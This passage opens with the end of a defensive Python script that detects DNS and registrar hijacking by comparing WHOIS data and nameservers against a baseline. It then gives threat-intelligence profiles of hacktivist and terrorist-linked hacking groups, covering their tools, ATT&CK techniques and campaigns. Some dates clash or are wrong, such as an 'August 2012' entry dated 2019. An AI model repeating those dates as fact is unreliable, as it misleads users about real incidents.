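    """Parse 'Key: Value' lines of a simplified WHOIS response.
    'Name Server' repeats, so it is collected into a list; '%' and '#'
    comment lines and the '>>> Last update' trailer are ignored."""
    record: dict = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("%", "#", ">>>")) or ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()
        if key == "name server":
            record.setdefault(key, []).append(value)
        else:
            record[key] = value
    return record


def normalise_ns(names) -> frozenset:
    """DNS names are case-insensitive and may carry a trailing dot."""
    return frozenset(n.strip().lower().rstrip(".") for n in names if n.strip())


def check_domain(baseline: DomainBaseline, whois_text: str, resolved_ns) -> list:
    """Compare the registrar's WHOIS record and the live NS delegation (as
    answered by a resolver; passed in as a list here) against the baseline.
    Returns an empty list when nothing has drifted."""
    rec = parse_whois(whois_text)
    findings = []

    def expect(field_name, expected, observed, severity="high"):
        if expected != observed:
            findings.append(Finding(severity, field_name, expected, observed))

    # Registrar-side drift: the SEA changed only Facebook's contact data, which
    # already shows that the registrar account is under someone else's control.
    expect("registrar", baseline.registrar, rec.get("registrar", "<missing>"))
    expect("registrant email", baseline.registrant_email,
           rec.get("registrant email", "<missing>"), severity="medium")

    # Delegation drift in the registrar record: the WikiLeaks-style DNS hijack
    # points the domain at nameservers that serve a page the site never hosted.
    expected_ns = ",".join(sorted(baseline.nameservers))
    expect("whois nameservers", expected_ns,
           ",".join(sorted(normalise_ns(rec.get("name server", [])))))

    # Delegation drift as actually resolved: catches a change at the parent
    # zone even while the registrar's own record still looks right.
    expect("resolved nameservers", expected_ns,
           ",".join(sorted(normalise_ns(resolved_ns))))
    return findings


# Constructed baseline and sample records (placeholder names under .test/.invalid).
BASELINE = DomainBaseline(
    domain="example-news.test",
    registrar="Example Registrar, Inc.",
    registrant_email="dns-admin@example-news.test",
    nameservers=frozenset({"ns1.example-news.test", "ns2.example-news.test"}),
)

WHOIS_CLEAN = """\
% Constructed sample, not real registry data
Domain Name: EXAMPLE-NEWS.TEST
Registrar: Example Registrar, Inc.
Registrant Email: dns-admin@example-news.test
Name Server: NS1.EXAMPLE-NEWS.TEST
Name Server: ns2.example-news.test.
>>> Last update of WHOIS database: 2019-10-01T00:00:00Z <<<
"""

# Same record after a hijack: contact and delegation both rewritten.
WHOIS_HIJACKED = (WHOIS_CLEAN
                  .replace("dns-admin@example-news.test", "attacker@mailbox.invalid")
                  .replace("NS1.EXAMPLE-NEWS.TEST", "ns1.rogue-dns.invalid")
                  .replace("ns2.example-news.test.", "ns2.rogue-dns.invalid"))

if __name__ == "__main__":
    cases = (("clean", WHOIS_CLEAN, ["NS1.example-news.test.", "ns2.example-news.test"]),
             ("hijacked", WHOIS_HIJACKED, ["ns1.rogue-dns.invalid", "ns2.rogue-dns.invalid"]))
    for label, whois, ns in cases:
        findings = check_domain(BASELINE, whois, ns)
        print(f"{label}: {'no drift' if not findings else str(len(findings)) + ' finding(s)'}")
        for f in findings:
            print(f"  [{f.severity}] {f.field_name}: expected {f.expected!r}, observed {f.observed!r}")
```

In production the WHOIS text and NS answer would come from a scheduled registrar query and a resolver lookup; the comparison logic stays the same.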

MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access
T1078 - Valid Accounts
Persistence
T1078 - Valid Accounts
Privilege Escalation
T1078 - Valid Accounts
Defense Evasion
T1078 - Valid Accounts
Credential Access
T1003 - Credential Dumping
Impact
T1491 - Defacement
T1496 - Resource Hijacking
T1498 - Network Denial of Service

Alias: ATK 133, United Cyber Caliphate, UCC, TAG-CT6
Score: 38
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors: Aviation, Defense, Education, Government Agencies, Media, Military, Naval, Political Organizations
Motivations & Objectives: Ideology, Notoriety, Organizational gain, Revenge, Unpredictable
Language: English, Arabic

DESCRIPTION
United Cyber Caliphate (UCC), or Islamic State Hacking Division, is the name of an umbrella for several hacking groups working for the Islamic State of Iraq and the Levant (ISIS or ISIL) terrorist organization. The organization emerged in April 2016. It is mostly known for its campaign against US military and governmental personnel. On April 4, 2016, the Cyber Caliphate Army (CCA), the principal ISIS hacking unit, and other pro-ISIS groups like the Sons Caliphate Army (SCA) and Kalacnikov.TN (KTN) merged and formed the United Cyber Caliphate (UCC). UCC groups include:
- Cyber Caliphate, or Cyber Caliphate Army (CCA), was established shortly after the establishment of the Islamic State. The key person behind the group was Junaid Hussain (Abu Hussain al Britani), or TriCK. The most important cyber-terrorist attack of the CCA occurred in January 2015, when the Twitter and YouTube accounts of U.S. Central Command and later the Twitter accounts of the magazine Newsweek were hacked.
- The Sons Caliphate Army (SCA) was established in 2016 as a subgroup of Cyber Caliphate. It is mostly known for disrupting social media traffic on Facebook and Twitter. SCA claimed to have hacked 10,000 Facebook accounts, more than 150 Facebook groups and over 5,000 Twitter profiles.
- Kalashnikov E-Security Team was established in 2016. This group is focused on tech security advisory for ISIS jihadists. It also uploaded ISIS-related jihadi literature, sharing posts from cyber jihadi groups, reporting successful attacks on websites and Facebook pages and publishing various web-hacking techniques. Gradually, the hackers started to conduct or assist in defacement hacks.

CAMPAIGNS
01/2015 - The Albuquerque Journal and Maryland's WBOC Hacking
CCA - Cyber Caliphate took over the news organizations' Twitter handles and posted several confidential documents, including driver's licenses, corrections records and spreadsheets with hundreds of names and addresses. The group also replaced the news organizations' Twitter account profile and cover photos with ISIS-themed art.

01/2015 - Malaysia Airlines Website Attack
CCA - The Malaysia Airlines website was compromised by "Lizard Squad". The website's front page was replaced with an image of a tuxedo-wearing lizard and read "Hacked by LIZARD SQUAD - OFFICIAL CYBER CALIPHATE". It is debated whether the website was merely hacked or was also a victim of DNS spoofing.

02/2015 - Newsweek magazine Twitter account hijacked
CCA - The Cyber Caliphate hijacked Newsweek magazine's Twitter account and threatened President Obama's wife and daughters.

09/2015 - TV5Monde Attack
CCA - Islamic State hackers hacked the French television network TV5Monde, bringing the television broadcasts to a halt and hijacking its social networks and websites. Further investigations suggest a Russian group was actually behind the incident, but this was never confirmed. A warning message was issued in Arabic, but with a lot of spelling and grammar mistakes, indicating "the authors are not Arabic". French authorities later suspected APT28, a Russian hacking group, of performing the attack.

09/2015 - UK Government Email Hacking
ISIS intercepted top secret emails of the British Government in a major security breach uncovered by GCHQ.

04/2016 - Australian Websites Hacking
UCC - The United Cyber Caliphate went on a website defacement spree, breaking into more than 20 Australian small business websites.

04/2017 - 8K Kill List Release
UCC - United Cyber Caliphate released a kill list that includes 8,786 names of Americans.

10/2018 - ISIS Launch Cracking Software
UCC - Cyber Caliphate Team launched "Multy BruteForce Facebook", a Facebook-cracking software.

Timeline:
Jan-2015 - The Albuquerque Journal and Maryland's WBOC Hacking; Malaysia Airlines Website Attack
Feb-2015 - Newsweek magazine Twitter account hijacked
Sep-2015 - TV5Monde Attack; UK Government Email Hacking
Apr-2016 - Australian Websites Hacking
Apr-2017 - 8K Kill List Release
Oct-2018 - ISIS Launch Cracking Software



Targeted Countries: Australia, Egypt, France, Malaysia, United Kingdom, United States
Assumed origin of the attacker: Worldwide

MODUS OPERANDI (ATT&CK FRAMEWORK)

Execution
T1072 - Third-party Software
Credential Access
T1003 - Credential Dumping
T1110 - Brute Force
Lateral Movement
T1072 - Third-party Software
Collection
T1114 - Email Collection
Impact
T1491 - Defacement
T1499 - Endpoint Denial of Service

TOOLS, MALWARES AND VULNERABILITIES


Malwares
Custom tools: Multy BruteForce Facebook; Caliphate Cannon
Tools used by multiple adversaries: Ancalog Exploit Builder: a document exploitation tool
Publicly available tools: None Identified
Legitimate software: Telegram: Messages App; WhatsApp: Messages App
Exploited vulnerabilities: None Identified

Alias: ATK 89, DESERT FALCONS (sub-group), GAZA CYBERGANG, GAZA CYBER GANG, GAZA HACKERS TEAM, MoleRATs (sub-group), OPERATION PARLIAMENT (sub-group, named after their campaign), TAG-CT5
Score: 35
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors: Aerospace, Defense, Energy, Financial Services, Government Agencies, High-Tech, Media
Motivations & Objectives: Ideology
Language: Arabic

DESCRIPTION
Gaza Cybergang is an Arabic, politically motivated APT group, active all over the world, including in Europe and the US, but mainly active in the Middle East and North Africa (MENA) and in Palestine in particular. The group is comprised of three sub-groups:
* Gaza Cybergang Group 1, aka MoleRATs: The group's aim is to infect the victim with a RAT, and it often makes use of text-sharing platforms such as PasteBin, github.com, upload.cat and more.
* Gaza Cybergang Group 2, aka Desert Falcons: The group makes use of homemade malware, tools and techniques. Victims are often infected by social engineering methods such as fake websites that promise political information, or spear-phishing emails and social messaging.
* Gaza Cybergang Group 3, aka Operation Parliament: The group is focused on espionage, covering executive and judicial bodies all over the world and focusing on MENA, particularly Palestine. The group used malware with CMD/PowerShell commands for its attacks.
Each group differs in TTPs, but they make use of the same tools after gaining the initial grip on their victims.

TOOLS, MALWARES AND VULNERABILITIES
Malwares
Custom tools: Falcons' Backdoor; Falcons' Downloader; DustySky (NeD Worm); DHS Spyware; DHS2015 / iRat; Molerat Loader; Scote; TajMahal APT Framework
Tools used by multiple adversaries: Poison Ivy; Cobalt Strike; Downeks; Quasar RAT; njRAT; XtremeRAT
Publicly available tools: BrowserPasswordDump10: Password dumper
Legitimate software: None identified
Exploited vulnerabilities: CVE-2017-0199

Targeted Countries: Afghanistan, Algeria, Canada, China, Chile, Denmark, Djibouti, Egypt, Germany, India, Iran, Iraq, Israel, Jordan, Kuwait, Lebanon, Latvia, Libya, Macedonia, Morocco, New Zealand, Oman, Palestine, Qatar, Russia, Saudi Arabia, Serbia, Slovenia, Somalia, South Korea, Syria, Turkey, UAE, United Kingdom, United States, Yemen
Assumed origin of the attacker: Palestinian National Authority, MENA

CAMPAIGNS
January 2012 - Defacement of Israeli Websites
Arabic hackers calling themselves "Gaza Hackers Team" hacked the Israel Fire and Rescue services website and posted the message "Death to Israel".

October 2012 - Operation "MoleRATs"
Israeli government websites were attacked, and officials were temporarily cut off from the internet. This campaign also targeted Palestinians and the governments of the US and UK. The hackers were discovered to be the "Gaza Hackers Team".

March 2013 - 2014 - 1st Campaign
The first and main campaign of the Desert Falcons sub-group, with the highest number of victims, targeting devices and mobiles. Targets include Palestine and Gulf states, including government organizations, military centers and top media outlets.

March 2013 - 2014 - 2nd Campaign
The second campaign of the Desert Falcons sub-group was focused mainly on Israel, while using the main Falcons Trojan. Over 600 victims have been identified.

March 2013 - 2014 - 3rd Campaign
The third campaign of the Desert Falcons sub-group was focused mainly on politicians and media figures in Egypt. This is the sole campaign in which the DHS spyware was used.

June-July 2013 - Poison Ivy Attacks
MoleRATs used PIVY (Poison Ivy) against Middle Eastern and US targets.

April 2014 - Attacks on US and European targets
MoleRATs, using XtremeRAT, attacked a US financial institution and multiple European government organizations.

Summer 2014 - Attacks against Israeli and Palestinian Interests
The attackers dropped malware via decoy documents and filenames utilized in the attacks. Further examination of the case implies the intended targets comprise organizations with political interests or influence in Israel and Palestine. TTPs suggest MoleRATs or Palestinian hackers are behind the attack.

2014 - 2016 - Operation Moonlight
Based on the tools and targets, the Gaza Hacker Team is behind more than 200 attacks in the past two years. The attacks were against targets in Palestine, Egypt, the US, Jordan, Libya, Iran, Israel and China.

September 2015 - Operation DustySky
MoleRATs have used the DustySky malware during a campaign in multiple attacks, which are targeted but not spear-phished, meaning they are not tailored specifically to each and every target. They include malicious email messages that are delivered to selected targets. Targets include Israel, Egypt, Saudi Arabia, the United Arab Emirates, Iraq, the US and different countries in Europe.

September 2016 - Operation DustySky part 2
MoleRATs stopped previous attacks in the Middle East but renewed them after 20 days. Hamas is suspected to be behind the attacks.

2017 - Mobile Espionage, Macros and CVE-2017-0199
Gaza Cybergang began targeting the oil and gas industry in MENA, infiltrating systems and pilfering data. The group also abused the CVE-2017-0199 vulnerability and Microsoft Access files. Traces of mobile malware were also discovered in late 2017.

2017 - Operation Parliament
Since early 2017, the group called Operation Parliament has been attacking in the Middle East with sophisticated cyber capabilities. They have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their command and control servers. Operation Parliament's victims are different from those of Gaza Cybergang and Desert Falcons, since they were more focused on information gathering. Their malware provides a remote CMD/PowerShell terminal for the attackers, enabling script/command execution, with results received via HTTP requests.

February 2019 - Middle East Attack
MoleRATs are suspected of using an Office Word document with embedded malicious macros that drops and executes a backdoor packed with Enigma Virtual Box. The backdoor includes a built-in keyword list with names of people or opera movies used to communicate with the C2, which distributes control commands to further control the victim's computer.

April 2019 - "SneakyPastes" Campaign
The Gaza Cybergang initiated a multistage campaign that begins with phishing emails sent from one-time addresses and one-time domains. The emails might include links to malware or infected attachments. If the victim opens the attachment (or follows the link), their device receives Stage One malware programmed to activate the infection chain. Once the Stage One malware infects the computer, it tries to secure its position, conceal its presence from antivirus and hide the command server. Finally, the device is infected with a RAT that scans it for PDF, DOC, DOCX and XLSX files to be sent to a C2 server.

April 2019 - TajMahal APT Framework
The Gaza Cybergang has utilized TajMahal, which included two malware packages, "Tokyo" and "Yokohama". Tokyo is used as a first-stage infection that subsequently deploys Yokohama as a second-stage attack on victims who are deemed of interest.

Timeline:
Jan-2012 - Defacement of Israeli websites
Oct-2012 - Operation "MoleRATs"
Mar-2013 - 1st campaign; 2nd campaign
Jun-2013 - Poison Ivy attacks
Apr-2014 - Attacks on US and European targets
Summer 2014 - Attacks against Israeli and Palestinian interests
2014-2016 - Operation Moonlight
Sep-2015 - Operation DustySky
Sep-2016 - Operation DustySky part 2
2017 - Mobile espionage, Macros and CVE-2017-0199; Operation Parliament
Feb-2019 - Middle East attack
Apr-2019 - "SneakyPastes" campaign; TajMahal APT Framework


MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access
T1091 - Replication Through Removable Media
Defense Evasion
T1116 - Code Signing
Credential Access
T1003 - Credential Dumping
Discovery
T1057 - Process Discovery
Lateral Movement
T1091 - Replication Through Removable Media
Command and Control
T1008 - Fallback Channels
Impact
T1491 - Defacement

Alias: ATK 142, PRYZRAKY GROUP, TAG-HA11
Score: 35
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors: Communication, Cyber-security, Defense, Education, Energy, Financial Services, Government Agencies, International Organizations, Political Organizations
Motivations & Objectives: Ideology, Personal-satisfaction, Unpredictable
Language: Portuguese, English

DESCRIPTION
Pryzraky Group is a group of Brazilian hackers, active since at least 2018. The group mainly carries out attacks against websites, including defacements, DDoS and data leaks, and recently began doxxing as well. The group is mainly known for taking down the websites of NASA and the NSA in 2019. The group's members are Mecz1nho (the group's founder), al1ne3737 (main attacker), Inocent, F1r3bl00d, ZHacker13 (an Israeli hacker), D4RKR0N, Poptart, Aj44x, xS1lenc3d, Dext3r and LcsCyan. The group often tags along with various global Anonymous campaigns worldwide and targets mainly educational, government and law enforcement websites in various countries. However, it seems that the main motive of this group is boredom, challenge or proving a point, rather than real ideology.

TOOLS, MALWARES AND VULNERABILITIES


Malwares
Custom tools: FuckingBotnet; KLTools
Tools used by multiple adversaries: None Identified
Publicly available tools: None Identified
Legitimate software: None Identified
Exploited vulnerabilities: None Identified



Targeted Countries: Algeria, Argentina, Bahamas, Bangladesh, Barbados, Brazil, Cambodia, Colombia, Costa Rica, European Union, France, Germany, India, Indonesia, Israel, Japan, Mexico, Nicaragua, Peru, Saudi Arabia, Spain, Sudan, UAE, United Kingdom, United States, Venezuela
Assumed origin of the attacker: Brazil

CAMPAIGNS
October 2018 - #OpKhashoggi
As part of the global Anonymous campaign targeting Saudi Arabia following the death of Jamal Khashoggi, Pryzraky group carried out attacks against the Saudi University of Business and Technology, as well as two Saudi banks.

November 2018 - #OpAntiNazism
As part of an anti-nazism cyber campaign, the group targeted racist groups, including the KKK website.

December 2018 - #OpIcarus
A cyber campaign against the financial sector around the world that was first launched in February 2016. Since then, hacktivists have launched several additional phases of this campaign over the years. The Pryzraky Group participated in the campaign, carrying out attacks against the central banks of India, Barbados and the Bahamas.

January 2019 - NASA Breach
In January 2019, Pryzraky group claimed responsibility for using a DDoS attack to take down NASA's domain. According to the group's founder, Mecz1nho, NASA was picked as a target because many see their systems as an example.

February-March 2019 - #OpSudan
On February 14, 2019, the group declared they had joined #OpSudan - an international cyber campaign against Omar Al-Bashir's regime in Sudan. In this campaign, the group targeted multiple Sudanese Government-related domains in defacement, data leaks and DDoS attacks.

February-April 2019 - #OpVenezuela
On February 26, 2019, the group declared they had joined #OpVenezuela - an international campaign due to the protests in Venezuela. In this campaign, the group mainly carried out defacements, data leaks and DDoS attacks against domains of TV stations, universities and government agencies.

March 2019 - #OpNicaragua
#OpNicaragua is a hacktivist campaign against the government of Nicaragua in protest against its repression of protest movements in the country. In this campaign, Pryzraky group targeted universities and government-related websites in Nicaragua and Costa Rica.

March 2019 - #OpCopyWrong
In March 2019, Anonymous launched a campaign dubbed #OpCopyWrong, an international campaign targeting the EU and aimed at lobbying the European parliament against passing changes to the copyright laws. As part of this campaign, Pryzraky group leaked data and carried out other attacks on EU-related sites, including the Europol and EU government websites.

April 2019 - #OpEcuador / FreeAssange
In April 2019, the group joined the global FreeAssange campaign, targeting Ecuador following the extradition of WikiLeaks founder Julian Assange to the authorities in the UK. In this campaign, the group targeted government-related websites and domains, including the official website of the president of Ecuador and the website of the police of Ecuador. As part of this campaign, the group also attacked targets in the UK, such as the websites of the UK supreme court and the UK police.

April 2019 - #OpIsrael
A pro-Palestinian and anti-Israel cyber campaign which has occurred annually on April 7 since 2013. In 2019 Pryzraky joined the campaign and attacked the Israeli police department of investigations and intelligence, using the FuckingBotnet with Cloudflare bypass.

2018-2019 - Targeting Brazilian and Argentinian Politicians and the government and education sectors
Throughout their activity, Pryzraky group attacks Brazilian and Argentinian institutions, mainly in the education and government sectors. The attacks include defacements, data leaks, DDoS attacks and doxxing of judges and politicians.

Timeline:
2018-present - #OpIsrael; #OpNicaragua
2018-2019 - Targeting Brazilian and Argentinian politicians and the government and education sectors
Oct-2018 - #OpKhashoggi
Nov-2018 - #OpAntiNazism
Nov-2018 - #OpIcarus
Jan-2019 - NASA Breach
Feb-Mar-2019 - #OpSudan
Feb-Apr-2019 - #OpVenezuela
Mar-2019 - #OpNicaragua; #OpCopyWrong
Apr-2019 - #OpIsrael


MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access
T1190 - Exploit Public-Facing Application
Credential Access
T1003 - Credential Dumping
Impact
T1489 - Service Stop
T1491 - Defacement
T1498 - Network Denial of Service

Alias: Anon Italia, ATK 123, TAG-HA2
Score: 35
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors: Administration, Aviation, Defense, Education, Financial Services, Food and Agriculture, Government Agencies, Healthcare, Hospitality, International Organizations, Manufacturing, Media, Military, Naval, Pharmaceutical, Political Organizations, Research, Retail, Transportation
Motivations & Objectives: Ideology
Language: Italian
Assumed origin of the attacker

DESCRIPTION
Anonymous Italia is one of the oldest hacktivist groups on the Italian cyber-threat landscape, appearing in 2012. The group is characterized by an anarchist ideology, with a strong sense of social justice and environmental issues. This highly ideological imprint translates into a clear aversion towards Italian political institutions and security forces. In this context, we identify recurring patterns in the hacktivists' target selection: police, political parties, and government institutions have always been among their preferred targets. Of note, many attacks were apparently conducted in cooperation with two other Italian hacktivist groups, LulzSec ITA and AntiSecurity ITA, which share a similar ideology. Throughout its long activity, the group has executed hundreds of data leaks, defacements and DDoS attacks. Notable was the 2015 attack against the Ministry of Defense (with thousands of leaked records), which also led to the arrest of two prominent members of the collective, who used the aliases Aken and Otherwise. Interestingly, the latter contributed to the development of a "serverless" portal for coordinating the group's operations, named Osiris, demonstrating significant technical capabilities. Of note, the group is also actively involved in the promotion of real-world operations, such as #OpGreenRights, #OpPaperStorm, and the Million Mask March.

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: None Identified
Tools used by multiple adversaries: None Identified
Publicly available tools: None Identified
Legitimate software: None Identified
Exploited vulnerabilities: None Identified

Targeted Countries: Brazil, France, Italy
Assumed origin of the attacker: Italy

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1190 - Exploit Public-Facing Application
Exfiltration
T1002 - Data Compressed
Impact
T1491 - Defacement
T1498 - Network Denial of Service


CAMPAIGNS

April 2012 - FIMI Attack
On April 8, 2012, Anonymous Italia claimed responsibility for hacking the Italian Music Industry Federation (FIMI - hxxps://www.fimi.it), dumping two sensitive databases of the organization on a text-sharing platform.

April 2012 - Trenitalia Attack
On April 12, 2012, Anonymous Italia claimed responsibility for taking down (#TangoDown) the website of Trenitalia, the main Italian train operator.

August 2012 - Italian Ministry for Economic Development Attack
On August 31, 2019, Anonymous Italia hacked into the Italian Ministry for Economic Development, exploiting a Joomla CMS misconfiguration to exfiltrate a website configuration site.

September 2012-ongoing - #OpGreenRights
OpGreenRights is a longstanding hacktivist campaign joined by numerous Anonymous-affiliated groups worldwide (hxxps://twitter.com/OpGreenRights). Anonymous Italia has participated in the campaign since its early inception, usually focusing on environmental grievances pertaining to Italy. A review of the key operations is as follows: On September 11, 2012, Anonymous Italia promoted a live demonstration against Monsanto in multiple Italian cities. On April 16, 2014, Anonymous Italia targeted the website of Tuscany's environmental services provider A.S.A. S.p.A. (hxxps://www.asaspa.it). The hackers accessed the servers of the company, tampering with and leaking the data, and performing defacement attacks. On May 5, 2014, the group claimed responsibility for hacking the servers of the Riva Group, one of the main Italian steel producers, accusing the company of contaminating the population living in the proximity of its facilities. Sensitive documents and email conversations were dumped online. On June 13, 2014, Anonymous Italia claimed responsibility for DDoSing the website of the Brazilian military police, to protest its treatment of the indigenous population living in the Amazon rainforest. On June 22, 2014, Anonymous Italia claimed responsibility for hacking the website of the EU Sustainable Energy Week (#EUSEW2014), allegedly dumping thousands of records of organizations participating in the initiative, such as the World Bank, Bayer, ExxonMobil, Enel, Edf, GE, Shell, BP, Eni, Nokia, Intel, and more. On October 16, 2014, Anonymous Italia defaced the website of the Apulia Regional Council to protest the environmental damage caused by Taranto's steelwork company Ilva. On February 21, 2016, the group dumped online data stolen from the website of the Apulia regional council, against the decision to construct a gas pipeline crossing the area. The campaign was very active in 2019, with attacks against Ministero Ambiente (Ministry of Environment).

September 2012 - Monsanto Attack
On September 17, 2012, Anonymous Italia claimed responsibility for DDoSing the Italian website of Monsanto, in the context of a global mobilization against the company.

October 2012 - Italian Police Attack
On October 22, 2012, Anonymous Italia leaked online a substantial volume of data allegedly taken from the Italian Police's servers.

April 2014 - Italian Government and Defense Attack
On April 10, 2014, Anonymous Italia claimed responsibility for DDoSing websites related to the Italian Government and Defense Ministry. Allegedly, the websites were down for hours.

April 2014 - "Jobs Act" Attack
In the context of the job reforms proposed by PM Matteo Renzi, on April 12, 2014, Anonymous Italia claimed responsibility for DDoSing the website of the Prime Minister, the website of the Italian Ministry of Labor, as well as that of the Italian police.

November 2014 - #OpSAP (Italy's Police Work Union) Attack
On November 11, 2014, Anonymous Italia claimed responsibility for leaking information from the Police Work Union servers (hxxps://www.sap-nazionale.org), to protest the court verdict in the Stefano Cucchi death trial.

November 2014 - Lega Nord Attack
On November 16, 2014, Anonymous Italia claimed responsibility for defacing the Lega Nord party's website (Leganord.org), protesting its alleged racist ideology and policies.

November 2014 - Italian Penitentiary Police Attack
On November 22, 2014, Anonymous Italia claimed responsibility for hacking the servers of the Italian Penitentiary Police, leaking a significant volume of data. The motive behind the attack was to protest the numerous deaths of detainees during the past ten years.

December 2014 - #NoTAV Attack
On December 12, 2014, Anonymous Italia claimed responsibility for defacing 100 subdomains of the rhonealpes.fr domain, related to the French Rhône-Alpes Regional Council. The motive behind the attack was to protest the railroad project called TAV, which is expected to connect Turin with Lyon.

December 2014 - #OpItaly
On December 25, 2014, Anonymous Italia claimed responsibility for leaking an archive comprising more than 1500 private documents of the Italian Police, as revenge.

March 2015 - Attacks Against Two Right-Wing Parties
On March 15, 2015, Anonymous Italia claimed responsibility for DDoSing multiple websites of the Italian right-wing parties CasaPound and Forza Nuova.


April 2015 - AIFA Attack
On April 29, 2015, Anonymous Italia claimed responsibility for hacking the Italian Pharmaceutical Agency (AIFA), defacing its website. The motivation for the attack was to damage the global pharmaceutical industry, perceived by the group as a constant enemy.

May 2015 - Italian Ministry of Defense Attack
On May 18, 2015, Anonymous Italia claimed responsibility for leaking the personal details of over 1700 security personnel from the Italian Ministry of Defense's databases, publishing them online.

July 2015 - Attack Against Italian Law Enforcement Agencies
On July 20, 2015, Anonymous Italia claimed responsibility for defacing several websites related to the Italian LEA, dumping online a significant volume of stolen data. The attacks were revenge for the arrest of two Anonymous Italia members, named Aken and Otherwise.

February 2016 - #OpHomes Campaign
On February 16 and 18, 2016, Anonymous Italia claimed responsibility for stealing data and defacing multiple websites of Italian police labor unions, in a protest against the eviction of families from their houses in Livorno and Padua. On February 20, 2016, in continuation of the previous attacks, the hacktivists DDoSed the website of the Italian Ministry of Infrastructure and Transportation.

February 2016 - Attack Against Nuovo Centro Destra
On February 25, 2016, Anonymous Italia claimed responsibility for DDoSing the website of the Italian right-wing party Nuovo Centro Destra.

March 2016 - Campaign against the Italian Security Forces
On March 1, 2016, Anonymous Italia claimed responsibility for DDoSing the websites of the Italian Carabinieri, Police, and Defense and Interior Ministries.

May 2016 - Lega Nord Attack
On May 11, 2016, Anonymous Italia claimed responsibility for DDoSing the Lega Nord party's website, leganord.org.

August 2016 - #opNessunDorma Campaign
Operation #NessunDorma is a campaign carried out against over 40 Italian websites on August 4, 2016. The websites affected by the data breach range from job agencies, private businesses and consulting companies to personal sites. The hacktivists obtained all the leaked details after breaching the servers of Engitel, a Milan-based web agency providing e-commerce solutions to all the above-mentioned companies. The motivation was to fight against the new labor laws and temporary employment agencies.

September 2016 - Libero Quotidiano Attack
On September 21, 2016, Anonymous Italia claimed responsibility for leaking personal details of registered users and editorial staff of the Italian newspaper Libero (liberoquotidiano.it).

October 2016 - Penitentiary Police Attack
On October 12, 2016, Anonymous Italia claimed responsibility for breaching the servers of the Italian Penitentiary Police and related organizations.

February 2017 - Forza Nuova Attack
On February 21, 2017, Anonymous Italia claimed responsibility for again defacing the Forza Nuova right-wing party's website (forzanuova.eu).

May 2017 - Ministry of Foreign Affairs Attack
On May 20, 2017, Anonymous Italia, together with LulzSec and AntiSec, hacked the Italian Ministry of Foreign Affairs' servers, publishing sensitive data of the ministry personnel.

June 2017 - Carabinieri Attack
On June 12, 2017, Anonymous Italia claimed responsibility for breaching the servers of the Carabinieri (Italian special forces), dumping the stolen data online.

July 2018 - Ospedale Sant'Andrea Attack
On July 14, 2018, Anonymous Italia claimed responsibility for leaking thousands of records from Rome's hospital Ospedale Sant'Andrea, to protest the low level of security adopted by the Italian Healthcare Ministry to protect user data.

October/November 2018 - #FifthOfNovember Campaign
The hacktivists launched a series of attacks against dozens of targets in an apparently random fashion, notable among them Rome and Milan universities, local municipalities, national research institutions, and healthcare federations. Most of the attacks resulted in sensitive data being published online.

December 2018 - Healthcare Institutions Attack
On December 24, 2018, Anonymous Italia claimed responsibility for hacking dozens of Italian healthcare institutions, defacing websites and leaking a notable volume of data.

February 2019 - #OpSardegna Campaign
On February 12, 2019, Anonymous Italia claimed responsibility for hacking the Sardegna regional council website, as well as other local websites, to protest the government's agricultural policies vis-a-vis the region.
Alias: ATK 127, DEMONSAD3, DEMONSAD, DEMONSAD SECURITY, R CAMPIOLO (not certain), TAG-HA14
Score: 33
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors: Communication, Education, Financial Services, Food and Agriculture, Government Agencies, Healthcare, International Organizations
Motivations & Objectives: Ideology
Language: Portuguese

DESCRIPTION
A Portuguese-speaking hacktivist affiliated with NewSec Group and LulzSec Brazil. He usually targets Brazilian websites with different attack vectors, and therefore we assume that he is of Brazilian nationality. He also hacks different targets affiliated with various sectors around the world and participates in different cyber campaigns. He is highly active on social networks, especially on Twitter and YouTube, and usually publishes data leaks on his pastebin account.

CAMPAIGNS

2018 - 2019 - OpSudan
A cyber campaign that supports the protests against the Sudanese government. During March 2019, DemonSad3 claimed responsibility for shutting down a Sudanese government website.

April 2019 - OpAssange
A cyber campaign against the extradition of Julian Assange in April 2019. During April 2019, DemonSad3 defaced two Brazilian government websites and a British website.

June 2019 - OpIndonesia
A cyber campaign launched to protest against the violent clashes that followed the Indonesian elections (April 17, 2019) and the announcement of the Indonesian General Elections Commission on May 21, 2019. DemonSad3 claimed responsibility for leaking data of Indonesian government and official websites.

June 2019 - OpUSA
A cyber campaign against the United States. During June 2019, DemonSad3 published links to databases allegedly related to American official websites.

June 2019 - Targeting the website of the national university of Colombia
DemonSad3 published on his pastebin account a database allegedly related to the website of the national university of Colombia.

June 2019 - Targeting a government website of Paraguay
DemonSad3 published on his pastebin account a database allegedly related to a government website of Paraguay.

August 2019 - Targeting websites of Angola
DemonSad3 claimed responsibility for mass defacing websites of a company that operates in Angola. DemonSad3 also claimed responsibility for shutting down and defacing various Brazilian government and official websites, and tweeted links to allegedly related data leaks.

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: None Identified
Tools used by multiple adversaries: None Identified
Publicly available tools: Metasploit; SQLmap; WordPress; Nmap; Joomla Component com_kunena SQL Injection exploit; paping.exe (a pentesting tool); poof.pl (a simple script written in Perl); samirox.dz
Legitimate software: None Identified
Exploited vulnerabilities: None listed

Targeted Countries: Angola, Brazil, Colombia, Indonesia, Paraguay, Sudan, United Kingdom, United States
Assumed origin of the attacker: Brazil

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1190 - Exploit Public-Facing Application
Collection
T1005 - Data from Local System
Impact
T1498 - Network Denial of Service
Alias: ATK 137, NEWSEC GROUP, TAG-HA3
Score: 33
